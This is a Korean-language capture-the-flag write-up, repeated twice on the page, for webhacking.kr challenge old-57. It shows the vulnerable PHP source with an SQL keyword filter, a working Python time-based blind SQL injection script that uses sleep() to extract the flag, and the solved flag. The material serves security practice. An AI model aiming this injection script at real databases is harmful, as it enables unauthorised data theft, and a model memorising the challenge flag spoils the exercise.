old-57 (600)

Last updated 5 years ago

Was this helpful?

old-57 (600)

첫 화면이다.

view-source를 클릭해 본 소스는 아래와 같다.

<?php
  include "../../config.php";
  include "./flag.php";
  if($_GET['view_source']) view_source();
?><html>
<head>
<title>Challenge 57</title>
</head>
<body>
<?php
  $db = dbconnect();
  if($_GET['msg'] && isset($_GET['se'])){
    $_GET['msg'] = addslashes($_GET['msg']);
    $_GET['se'] = addslashes($_GET['se']);
    if(preg_match("/select|and|or|not|&|\||benchmark/i",$_GET['se'])) exit("Access Denied");
    mysqli_query($db,"insert into chall57(id,msg,pw,op) values('{$_SESSION['id']}','{$_GET['msg']}','{$flag}',{$_GET['se']})");
    echo "Done<br><br>";
    if(rand(0,100) == 1) mysqli_query($db,"delete from chall57");
  }
?>
<form method=get action=index.php>
<table border=0>
<tr><td>message</td><td><input name=msg size=50 maxlength=50></td></tr>
<tr><td>secret</td><td><input type=radio name=se value=1 checked>yes<br><br><input type=radio name=se value=0>no</td></tr>
<tr><td colspan=2 align=center><input type=submit></td></tr>
</table>
</form>
<br><br><a href=./?view_source=1>view-source</a>
</body>
</html>

폼에 abc 를 넣고 제출하면 아래와 같이 나타난다.

출력 값이 고정이므로 Time-based Blind SQL Injection으로 인식하였다.

파이썬 코드를 짜면 아래와 같다.

import requests
import time

URL = 'https://webhacking.kr/challenge/web-34/index.php?msg=abc&se='
SLEEP = 10


def query(payload):
    start = time.time()
    requests.get(URL + payload)
    if time.time() - start > SLEEP:
        return True
    else:
        return False


# 24
def find_flag_length():
    flag_len = 1
    while query('if(length(pw)={},sleep({}),1)'.format(flag_len, SLEEP)) is False:
        flag_len += 1
    print('flag_len: {}'.format(flag_len))
    return flag_len


# FLAG{y2u.be/kmPgjr0EL64}
def find_flag():
    flag_len = 24
    flag = ''
    for pos in range(1, flag_len + 1):
        for character in range(0, 128):
            if query('if(ascii(substr(pw,{},1))={},sleep({}),1)'.format(pos, character, SLEEP)) is True:
                flag += chr(character)
                break
    print('flag: {}'.format(flag))


find_flag()

실행 결과, 플래그는 FLAG{y2u.be/kmPgjr0EL64}이다.

Auth 창에 플래그를 넣고 제출하면 문제가 풀린다.

Previousold-56 (250)Nextold-58 (150)

Last updated 5 years ago

Was this helpful?

첫 화면이다.

view-source를 클릭해 본 소스는 아래와 같다.

<?php
  include "../../config.php";
  include "./flag.php";
  if($_GET['view_source']) view_source();
?><html>
<head>
<title>Challenge 57</title>
</head>
<body>
<?php
  $db = dbconnect();
  if($_GET['msg'] && isset($_GET['se'])){
    $_GET['msg'] = addslashes($_GET['msg']);
    $_GET['se'] = addslashes($_GET['se']);
    if(preg_match("/select|and|or|not|&|\||benchmark/i",$_GET['se'])) exit("Access Denied");
    mysqli_query($db,"insert into chall57(id,msg,pw,op) values('{$_SESSION['id']}','{$_GET['msg']}','{$flag}',{$_GET['se']})");
    echo "Done<br><br>";
    if(rand(0,100) == 1) mysqli_query($db,"delete from chall57");
  }
?>
<form method=get action=index.php>
<table border=0>
<tr><td>message</td><td><input name=msg size=50 maxlength=50></td></tr>
<tr><td>secret</td><td><input type=radio name=se value=1 checked>yes<br><br><input type=radio name=se value=0>no</td></tr>
<tr><td colspan=2 align=center><input type=submit></td></tr>
</table>
</form>
<br><br><a href=./?view_source=1>view-source</a>
</body>
</html>

폼에 abc 를 넣고 제출하면 아래와 같이 나타난다.

출력 값이 고정이므로 Time-based Blind SQL Injection으로 인식하였다.

파이썬 코드를 짜면 아래와 같다.

import requests
import time

URL = 'https://webhacking.kr/challenge/web-34/index.php?msg=abc&se='
SLEEP = 10


def query(payload):
    start = time.time()
    requests.get(URL + payload)
    if time.time() - start > SLEEP:
        return True
    else:
        return False


# 24
def find_flag_length():
    flag_len = 1
    while query('if(length(pw)={},sleep({}),1)'.format(flag_len, SLEEP)) is False:
        flag_len += 1
    print('flag_len: {}'.format(flag_len))
    return flag_len


# FLAG{y2u.be/kmPgjr0EL64}
def find_flag():
    flag_len = 24
    flag = ''
    for pos in range(1, flag_len + 1):
        for character in range(0, 128):
            if query('if(ascii(substr(pw,{},1))={},sleep({}),1)'.format(pos, character, SLEEP)) is True:
                flag += chr(character)
                break
    print('flag: {}'.format(flag))


find_flag()

실행 결과, 플래그는 FLAG{y2u.be/kmPgjr0EL64}이다.

Auth 창에 플래그를 넣고 제출하면 문제가 풀린다.